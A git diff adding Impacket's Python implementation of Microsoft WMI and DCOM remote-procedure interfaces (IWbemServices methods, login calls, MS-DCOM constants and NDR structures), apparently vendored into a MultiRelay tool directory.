+ request = IWbemServices_OpenNamespace()
+ request['strNamespace']['asData'] = strNamespace
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def CancelAsyncCall(self,IWbemObjectSink ):
+ request = IWbemServices_CancelAsyncCall()
+ request['IWbemObjectSink'] = IWbemObjectSink
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp['ErrorCode']
+
+ def QueryObjectSink(self):
+ request = IWbemServices_QueryObjectSink()
+ request['lFlags'] = 0
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return INTERFACE(self.get_cinstance(), b''.join(resp['ppResponseHandler']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target())
+
+ def GetObject(self, strObjectPath, lFlags=0, pCtx=NULL):
+ request = IWbemServices_GetObject()
+ request['strObjectPath']['asData'] = strObjectPath
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ ppObject = IWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(),
+ oxid=self.get_oxid(), target=self.get_target()), self)
+ if resp['ppCallResult'] != NULL:
+ ppcallResult = IWbemCallResult(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()))
+ else:
+ ppcallResult = NULL
+ return ppObject, ppcallResult
+
+ def GetObjectAsync(self, strNamespace, lFlags=0, pCtx = NULL):
+ request = IWbemServices_GetObjectAsync()
+ request['strObjectPath']['asData'] = checkNullString(strNamespace)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def PutClass(self, pObject, lFlags=0, pCtx=NULL):
+ request = IWbemServices_PutClass()
+ request['pObject'] = pObject
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def PutClassAsync(self, pObject, lFlags=0, pCtx=NULL):
+ request = IWbemServices_PutClassAsync()
+ request['pObject'] = pObject
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def DeleteClass(self, strClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_DeleteClass()
+ request['strClass']['asData'] = checkNullString(strClass)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def DeleteClassAsync(self, strClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_DeleteClassAsync()
+ request['strClass']['asData'] = checkNullString(strClass)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def CreateClassEnum(self, strSuperClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_CreateClassEnum()
+ request['strSuperClass']['asData'] = checkNullString(strSuperClass)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def CreateClassEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_CreateClassEnumAsync()
+ request['strSuperClass']['asData'] = checkNullString(strSuperClass)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def PutInstance(self, pInst, lFlags=0, pCtx=NULL):
+ request = IWbemServices_PutInstance()
+
+ if pInst is NULL:
+ request['pInst'] = pInst
+ else:
+ request['pInst']['ulCntData'] = len(pInst)
+ request['pInst']['abData'] = list(pInst.getData())
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IWbemCallResult(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()))
+
+ def PutInstanceAsync(self, pInst, lFlags=0, pCtx=NULL):
+ request = IWbemServices_PutInstanceAsync()
+ request['pInst'] = pInst
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def DeleteInstance(self, strObjectPath, lFlags=0, pCtx=NULL):
+ request = IWbemServices_DeleteInstance()
+ request['strObjectPath']['asData'] = checkNullString(strObjectPath)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IWbemCallResult(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()))
+
+ def DeleteInstanceAsync(self, strObjectPath, lFlags=0, pCtx=NULL):
+ request = IWbemServices_DeleteInstanceAsync()
+ request['strObjectPath']['asData'] = checkNullString(strObjectPath)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def CreateInstanceEnum(self, strSuperClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_CreateInstanceEnum()
+ request['strSuperClass']['asData'] = strSuperClass
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return IEnumWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()))
+
+ def CreateInstanceEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):
+ request = IWbemServices_CreateInstanceEnumAsync()
+ request['strSuperClass']['asData'] = checkNullString(strSuperClass)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ #def ExecQuery(self, strQuery, lFlags=WBEM_QUERY_FLAG_TYPE.WBEM_FLAG_PROTOTYPE, pCtx=NULL):
+ def ExecQuery(self, strQuery, lFlags=0, pCtx=NULL):
+ request = IWbemServices_ExecQuery()
+ request['strQueryLanguage']['asData'] = checkNullString('WQL')
+ request['strQuery']['asData'] = checkNullString(strQuery)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IEnumWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()), self)
+
+ def ExecQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):
+ request = IWbemServices_ExecQueryAsync()
+ request['strQueryLanguage']['asData'] = checkNullString('WQL')
+ request['strQuery']['asData'] = checkNullString(strQuery)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def ExecNotificationQuery(self, strQuery, lFlags=0, pCtx=NULL):
+ request = IWbemServices_ExecNotificationQuery()
+ request['strQueryLanguage']['asData'] = checkNullString('WQL')
+ request['strQuery']['asData'] = checkNullString(strQuery)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IEnumWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()), self)
+
+ def ExecNotificationQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):
+ request = IWbemServices_ExecNotificationQueryAsync()
+ request['strQueryLanguage']['asData'] = checkNullString('WQL')
+ request['strQuery']['asData'] = checkNullString(strQuery)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def ExecMethod(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL, ppOutParams = NULL):
+ request = IWbemServices_ExecMethod()
+ request['strObjectPath']['asData'] = checkNullString(strObjectPath)
+ request['strMethodName']['asData'] = checkNullString(strMethodName)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ if pInParams is NULL:
+ request['pInParams'] = pInParams
+ else:
+ request['pInParams']['ulCntData'] = len(pInParams)
+ request['pInParams']['abData'] = list(pInParams.getData())
+
+ request.fields['ppCallResult'] = NULL
+ if ppOutParams is NULL:
+ request.fields['ppOutParams'].fields['Data'] = NULL
+ else:
+ request['ppOutParams']['ulCntData'] = len(ppOutParams.getData())
+ request['ppOutParams']['abData'] = list(ppOutParams.getData())
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppOutParams']['abData']), self.get_ipidRemUnknown(),
+ oxid=self.get_oxid(), target=self.get_target()))
+
+ def ExecMethodAsync(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL):
+ request = IWbemServices_ExecMethodAsync()
+ request['strObjectPath']['asData'] = checkNullString(strObjectPath)
+ request['strMethodName']['asData'] = checkNullString(strMethodName)
+ request['lFlags'] = lFlags
+ request['pCtx'] = pCtx
+ request['pInParams'] = pInParams
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+class IWbemLevel1Login(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemLevel1Login
+
+ def EstablishPosition(self):
+ request = IWbemLevel1Login_EstablishPosition()
+ request['reserved1'] = NULL
+ request['reserved2'] = 0
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp['LocaleVersion']
+
+ def RequestChallenge(self):
+ request = IWbemLevel1Login_RequestChallenge()
+ request['reserved1'] = NULL
+ request['reserved2'] = NULL
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp['reserved3']
+
+ def WBEMLogin(self):
+ request = IWbemLevel1Login_WBEMLogin()
+ request['reserved1'] = NULL
+ request['reserved2'] = NULL
+ request['reserved3'] = 0
+ request['reserved4'] = NULL
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp['reserved5']
+
+ def NTLMLogin(self, wszNetworkResource, wszPreferredLocale, pCtx):
+ request = IWbemLevel1Login_NTLMLogin()
+ request['wszNetworkResource'] = checkNullString(wszNetworkResource)
+ request['wszPreferredLocale'] = checkNullString(wszPreferredLocale)
+ request['lFlags'] = 0
+ request['pCtx'] = pCtx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return IWbemServices(
+ INTERFACE(self.get_cinstance(), b''.join(resp['ppNamespace']['abData']), self.get_ipidRemUnknown(),
+ target=self.get_target()))
+
+
+if __name__ == '__main__':
+ # Example 1
+ baseClass = b'xV4\x12\xd0\x00\x00\x00\x05\x00DPRAVAT-DEV\x00\x00ROOT\x00\x1d\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80f\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x05\xff\xff\xff\xff<\x00\x00\x80\x00Base\x00\x00Id\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x004\x00\x00\x00\x01\x00\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x0c\x00\x00\x00\x00\x004\x00\x00\x00\x00\x80\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00'
+
+ #encodingUnit = ENCODING_UNIT(baseClass)
+ #encodingUnit.dump()
+ #encodingUnit['ObjectBlock'].printInformation()
+ #print "LEN ", len(baseClass), len(encodingUnit)
+
+ #myClass = b"xV4\x12.\x02\x00\x00\x05\x00DPRAVAT-DEV\x00\x00ROOT\x00f\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x05\xff\xff\xff\xff<\x00\x00\x80\x00Base\x00\x00Id\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x004\x00\x00\x00\x01\x00\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x0c\x00\x00\x00\x00\x004\x00\x00\x00\x00\x80v\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x0e\x00\x00\x00\x00Base\x00\x06\x00\x00\x00\x11\x00\x00\x00\t\x00\x00\x00\x00\x08\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00'\x00\x00\x00.\x00\x00\x00U\x00\x00\x00\\\x00\x00\x00\x99\x00\x00\x00\xa0\x00\x00\x00\xc7\x00\x00\x00\xcb\x00\x00\x00G\xff\xff\xff\xff\xff\xff\xff\xff\xfd\x00\x00\x00\xff\xff\xff\xff\x11\x01\x00\x80\x00MyClass\x00\x00Description\x00\x00MyClass Example\x00\x00Array\x00\x13 \x00\x00\x03\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00M\x00\x00\x00\x00uint32\x00\x00Data1\x00\x08\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x00\x00'\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\x91\x00\x00\x00\x03\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x04\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x00string\x00\x00Data2\x00\x08\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\xbf\x00\x00\x00\x00string\x00\x00Id\x00\x03@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80#\x08\x00\x00\x00\xf5\x00\x00\x00\x01\x00\x00\x803\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00s\x00\x00\x00\x802\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00"
+ #hexdump(myClass)
+ #encodingUnit = ENCODING_UNIT(myClass)
+ #print "LEN ", len(myClass), len(encodingUnit)
+ #encodingUnit.dump()
+ #encodingUnit['ObjectBlock'].printInformation()
+
+ #instanceMyClass = b"xV4\x12\xd3\x01\x00\x00\x06\x00DPRAVAT-DEV\x00\x00ROOT\x00v\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x0e\x00\x00\x00\x00Base\x00\x06\x00\x00\x00\x11\x00\x00\x00\t\x00\x00\x00\x00\x08\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00'\x00\x00\x00.\x00\x00\x00U\x00\x00\x00\\\x00\x00\x00\x99\x00\x00\x00\xa0\x00\x00\x00\xc7\x00\x00\x00\xcb\x00\x00\x00G\xff\xff\xff\xff\xff\xff\xff\xff\xfd\x00\x00\x00\xff\xff\xff\xff\x11\x01\x00\x80\x00MyClass\x00\x00Description\x00\x00MyClass Example\x00\x00Array\x00\x13 \x00\x00\x03\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00M\x00\x00\x00\x00uint32\x00\x00Data1\x00\x08\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x00\x00'\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\x91\x00\x00\x00\x03\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x04\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x00string\x00\x00Data2\x00\x08\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\xbf\x00\x00\x00\x00string\x00\x00Id\x00\x03@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80#\x08\x00\x00\x00\xf5\x00\x00\x00\x01\x00\x00\x803\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00\x00 {\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x04\x00\x00\x00\x01&\x00\x00\x80\x00MyClass\x00\x03\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00StringField\x00"
+ #encodingUnit = ENCODING_UNIT(instanceMyClass)
+ #encodingUnit.dump()
+ #encodingUnit['ObjectBlock'].printInformation()
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
new file mode 100644
index 0000000..cf7651b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
@@ -0,0 +1,1903 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-DCOM] Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+# ToDo:
+# [X] Use the same DCE connection for all the calls. Right now is connecting to the remote machine
+# for each call, making it slower.
+#
+# [X] Implement a ping mechanism, otherwise the garbage collector at the server shuts down the objects if
+# not used, returning RPC_E_DISCONNECTED
+#
+from __future__ import division
+from __future__ import print_function
+import socket
+from struct import pack
+from threading import Timer, currentThread
+
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRTLSTRUCT, UNKNOWNDATA
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONGLONG, HRESULT, GUID, USHORT, WSTR, DWORD, LPLONG, LONG, PGUID, ULONG, \
+ UUID, WIDESTR, NULL
+from impacket import hresult_errors, LOG
+from impacket.uuid import string_to_bin, uuidtup_to_bin, generate
+from impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_NONE, \
+ RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_WINNT, DCERPCException
+from impacket.dcerpc.v5 import transport
+
+CLSID_ActivationContextInfo = string_to_bin('000001a5-0000-0000-c000-000000000046')
+CLSID_ActivationPropertiesIn = string_to_bin('00000338-0000-0000-c000-000000000046')
+CLSID_ActivationPropertiesOut = string_to_bin('00000339-0000-0000-c000-000000000046')
+CLSID_CONTEXT_EXTENSION = string_to_bin('00000334-0000-0000-c000-000000000046')
+CLSID_ContextMarshaler = string_to_bin('0000033b-0000-0000-c000-000000000046')
+CLSID_ERROR_EXTENSION = string_to_bin('0000031c-0000-0000-c000-000000000046')
+CLSID_ErrorObject = string_to_bin('0000031b-0000-0000-c000-000000000046')
+CLSID_InstanceInfo = string_to_bin('000001ad-0000-0000-c000-000000000046')
+CLSID_InstantiationInfo = string_to_bin('000001ab-0000-0000-c000-000000000046')
+CLSID_PropsOutInfo = string_to_bin('00000339-0000-0000-c000-000000000046')
+CLSID_ScmReplyInfo = string_to_bin('000001b6-0000-0000-c000-000000000046')
+CLSID_ScmRequestInfo = string_to_bin('000001aa-0000-0000-c000-000000000046')
+CLSID_SecurityInfo = string_to_bin('000001a6-0000-0000-c000-000000000046')
+CLSID_ServerLocationInfo = string_to_bin('000001a4-0000-0000-c000-000000000046')
+CLSID_SpecialSystemProperties = string_to_bin('000001b9-0000-0000-c000-000000000046')
+IID_IActivation = uuidtup_to_bin(('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57','0.0'))
+IID_IActivationPropertiesIn = uuidtup_to_bin(('000001A2-0000-0000-C000-000000000046','0.0'))
+IID_IActivationPropertiesOut = uuidtup_to_bin(('000001A3-0000-0000-C000-000000000046','0.0'))
+IID_IContext = uuidtup_to_bin(('000001c0-0000-0000-C000-000000000046','0.0'))
+IID_IObjectExporter = uuidtup_to_bin(('99fcfec4-5260-101b-bbcb-00aa0021347a','0.0'))
+IID_IRemoteSCMActivator = uuidtup_to_bin(('000001A0-0000-0000-C000-000000000046','0.0'))
+IID_IRemUnknown = uuidtup_to_bin(('00000131-0000-0000-C000-000000000046','0.0'))
+IID_IRemUnknown2 = uuidtup_to_bin(('00000143-0000-0000-C000-000000000046','0.0'))
+IID_IUnknown = uuidtup_to_bin(('00000000-0000-0000-C000-000000000046','0.0'))
+IID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ if self.error_code in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1]
+ return 'DCOM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'DCOM SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1 OID
+OID = ULONGLONG
+
+class OID_ARRAY(NDRUniConformantArray):
+ item = OID
+
+class POID_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', OID_ARRAY),
+ )
+
+# 2.2.2 SETID
+SETID = ULONGLONG
+
+# 2.2.4 error_status_t
+error_status_t = ULONG
+
+# 2.2.6 CID
+CID = GUID
+
+# 2.2.7 CLSID
+CLSID = GUID
+
+# 2.2.8 IID
+IID = GUID
+PIID = PGUID
+
+# 2.2.9 IPID
+IPID = GUID
+
+# 2.2.10 OXID
+OXID = ULONGLONG
+
+# 2.2.18 OBJREF
+FLAGS_OBJREF_STANDARD = 0x00000001
+FLAGS_OBJREF_HANDLER = 0x00000002
+FLAGS_OBJREF_CUSTOM = 0x00000004
+FLAGS_OBJREF_EXTENDED = 0x00000008
+
+# 2.2.18.1 STDOBJREF
+SORF_NOPING = 0x00001000
+
+# 2.2.20 Context
+CTXMSHLFLAGS_BYVAL = 0x00000002
+
+# 2.2.20.1 PROPMARSHALHEADER
+CPFLAG_PROPAGATE = 0x00000001
+CPFLAG_EXPOSE = 0x00000002
+CPFLAG_ENVOY = 0x00000004
+
+# 2.2.22.2.1 InstantiationInfoData
+ACTVFLAGS_DISABLE_AAA = 0x00000002
+ACTVFLAGS_ACTIVATE_32_BIT_SERVER = 0x00000004
+ACTVFLAGS_ACTIVATE_64_BIT_SERVER = 0x00000008
+ACTVFLAGS_NO_FAILURE_LOG = 0x00000020
+
+# 2.2.22.2.2 SpecialPropertiesData
+SPD_FLAG_USE_CONSOLE_SESSION = 0x00000001
+
+# 2.2.28.1 IDL Range Constants
+MAX_REQUESTED_INTERFACES = 0x8000
+MAX_REQUESTED_PROTSEQS = 0x8000
+MIN_ACTPROP_LIMIT = 1
+MAX_ACTPROP_LIMIT = 10
+
+################################################################################
+# STRUCTURES
+################################################################################
+class handle_t(NDRSTRUCT):
+ structure = (
+ ('context_handle_attributes',ULONG),
+ ('context_handle_uuid',UUID),
+ )
+
+ def __init__(self, data=None, isNDR64=False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ self['context_handle_uuid'] = b'\x00'*16
+
+ def isNull(self):
+ return self['context_handle_uuid'] == b'\x00'*16
+
+# 2.2.11 COMVERSION
+class COMVERSION(NDRSTRUCT):
+ structure = (
+ ('MajorVersion',USHORT),
+ ('MinorVersion',USHORT),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ if data is None:
+ self['MajorVersion'] = 5
+ self['MinorVersion'] = 7
+
+class PCOMVERSION(NDRPOINTER):
+ referent = (
+ ('Data', COMVERSION),
+ )
+
+# 2.2.13.1 ORPC_EXTENT
+# This MUST contain an array of bytes that form the extent data.
+# The array size MUST be a multiple of 8 for alignment reasons.
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+class ORPC_EXTENT(NDRSTRUCT):
+ structure = (
+ ('id',GUID),
+ ('size',ULONG),
+ ('data',BYTE_ARRAY),
+ )
+
+# 2.2.13.2 ORPC_EXTENT_ARRAY
+# ThisMUSTbeanarrayofORPC_EXTENTs.ThearraysizeMUSTbeamultipleof2for alignment reasons.
+class PORPC_EXTENT(NDRPOINTER):
+ referent = (
+ ('Data', ORPC_EXTENT),
+ )
+
+class EXTENT_ARRAY(NDRUniConformantArray):
+ item = PORPC_EXTENT
+
+class PEXTENT_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', EXTENT_ARRAY),
+ )
+
+class ORPC_EXTENT_ARRAY(NDRSTRUCT):
+ structure = (
+ ('size',ULONG),
+ ('reserved',ULONG),
+ ('extent',PEXTENT_ARRAY),
+ )
+
+class PORPC_EXTENT_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', ORPC_EXTENT_ARRAY),
+ )
+
+# 2.2.13.3 ORPCTHIS
+class ORPCTHIS(NDRSTRUCT):
+ structure = (
+ ('version',COMVERSION),
+ ('flags',ULONG),
+ ('reserved1',ULONG),
+ ('cid',CID),
+ ('extensions',PORPC_EXTENT_ARRAY),
+ )
+
+# 2.2.13.4 ORPCTHAT
+class ORPCTHAT(NDRSTRUCT):
+ structure = (
+ ('flags',ULONG),
+ ('extensions',PORPC_EXTENT_ARRAY),
+ )
+
+# 2.2.14 MInterfacePointer
+class MInterfacePointer(NDRSTRUCT):
+ structure = (
+ ('ulCntData',ULONG),
+ ('abData',BYTE_ARRAY),
+ )
+
+# 2.2.15 PMInterfacePointerInternal
+class PMInterfacePointerInternal(NDRPOINTER):
+ referent = (
+ ('Data', MInterfacePointer),
+ )
+
+# 2.2.16 PMInterfacePointer
+class PMInterfacePointer(NDRPOINTER):
+ referent = (
+ ('Data', MInterfacePointer),
+ )
+
+class PPMInterfacePointer(NDRPOINTER):
+ referent = (
+ ('Data', PMInterfacePointer),
+ )
+
+# 2.2.18 OBJREF
+class OBJREF(NDRSTRUCT):
+ commonHdr = (
+ ('signature',ULONG),
+ ('flags',ULONG),
+ ('iid',GUID),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ if data is None:
+ self['signature'] = 0x574F454D
+
+# 2.2.18.1 STDOBJREF
+class STDOBJREF(NDRSTRUCT):
+ structure = (
+ ('flags',ULONG),
+ ('cPublicRefs',ULONG),
+ ('oxid',OXID),
+ ('oid',OID),
+ ('ipid',IPID),
+ )
+
+# 2.2.18.4 OBJREF_STANDARD
+class OBJREF_STANDARD(OBJREF):
+ structure = (
+ ('std',STDOBJREF),
+ ('saResAddr',':'),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ OBJREF.__init__(self, data, isNDR64)
+ if data is None:
+ self['flags'] = FLAGS_OBJREF_STANDARD
+
+# 2.2.18.5 OBJREF_HANDLER
+class OBJREF_HANDLER(OBJREF):
+ structure = (
+ ('std',STDOBJREF),
+ ('clsid',CLSID),
+ ('saResAddr',':'),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ OBJREF.__init__(self, data, isNDR64)
+ if data is None:
+ self['flags'] = FLAGS_OBJREF_HANDLER
+
+# 2.2.18.6 OBJREF_CUSTOM
+class OBJREF_CUSTOM(OBJREF):
+ structure = (
+ ('clsid',CLSID),
+ ('cbExtension',ULONG),
+ ('ObjectReferenceSize',ULONG),
+ ('pObjectData',':'),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ OBJREF.__init__(self, data, isNDR64)
+ if data is None:
+ self['flags'] = FLAGS_OBJREF_CUSTOM
+
+# 2.2.18.8 DATAELEMENT
+class DATAELEMENT(NDRSTRUCT):
+ structure = (
+ ('dataID',GUID),
+ ('cbSize',ULONG),
+ ('cbRounded',ULONG),
+ ('Data',':'),
+ )
+
+class DUALSTRINGARRAYPACKED(NDRSTRUCT):
+ structure = (
+ ('wNumEntries',USHORT),
+ ('wSecurityOffset',USHORT),
+ ('aStringArray',':'),
+ )
+ def getDataLen(self, data, offset=0):
+ return self['wNumEntries']*2
+
+# 2.2.18.7 OBJREF_EXTENDED
+class OBJREF_EXTENDED(OBJREF):
+ structure = (
